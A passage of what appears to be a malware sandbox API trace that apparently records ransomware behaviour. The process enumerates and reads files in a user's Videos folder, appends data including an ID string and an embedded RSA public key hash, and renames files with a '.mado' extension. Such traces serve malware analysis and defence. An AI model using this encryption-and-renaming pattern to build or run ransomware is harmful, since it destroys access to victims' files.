0x32fe9a0 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe970 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.591] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b79950 [0205.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe958 | out: hHeap=0x2c0000) returned 1 [0205.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9a0 | out: hHeap=0x2c0000) returned 1 [0205.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79950 | out: hHeap=0x2c0000) returned 1 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9a0 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe970 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe958 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe958 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9a0 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.592] GetCurrentThreadId () returned 0x600 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69788 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.592] GetCurrentThreadId () returned 0x600 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b730a8 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9a0 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe958 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe970 [0205.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe940 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe988 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe958 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe958 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9a0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe958 | out: hHeap=0x2c0000) returned 1 [0205.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b75508 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b730a8 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75508 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe988 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9b8 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe940 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe928 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66588 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.596] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74e80*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b74e80*, lpNumberOfBytesWritten=0x39cfb14*=0x675, lpOverlapped=0x0) returned 1 [0205.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.596] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x67a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.596] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.597] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.597] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.597] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.597] CloseHandle (hObject=0x63c) returned 1 [0205.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.598] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\hx1rv6l-R8BlkwFTYKNO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\hx1rv6l-r8blkwftykno.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\hx1rv6l-R8BlkwFTYKNO.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\hx1rv6l-r8blkwftykno.flv.mado")) returned 1 [0205.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.598] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.599] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca303c0, ftCreationTime.dwHighDateTime=0x1d5deb9, ftLastAccessTime.dwLowDateTime=0x6a46b600, ftLastAccessTime.dwHighDateTime=0x1d5dc49, ftLastWriteTime.dwLowDateTime=0x6a46b600, ftLastWriteTime.dwHighDateTime=0x1d5dc49, nFileSizeHigh=0x0, nFileSizeLow=0x3185, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JiGMkp44.mkv", cAlternateFileName="")) returned 1 [0205.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.600] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\JiGMkp44.mkv") returned=".mkv" [0205.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\JiGMkp44.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\jigmkp44.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.600] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=12677) returned 1 [0205.600] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.603] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x315f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.603] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.604] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.604] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x3185, lpOverlapped=0x0) returned 1 [0205.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.605] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.606] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.606] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.606] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.606] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.606] GetLastError () returned 0x0 [0205.606] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.606] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.606] UuidCreate (in: Uuid=0x39cfa48 | out: 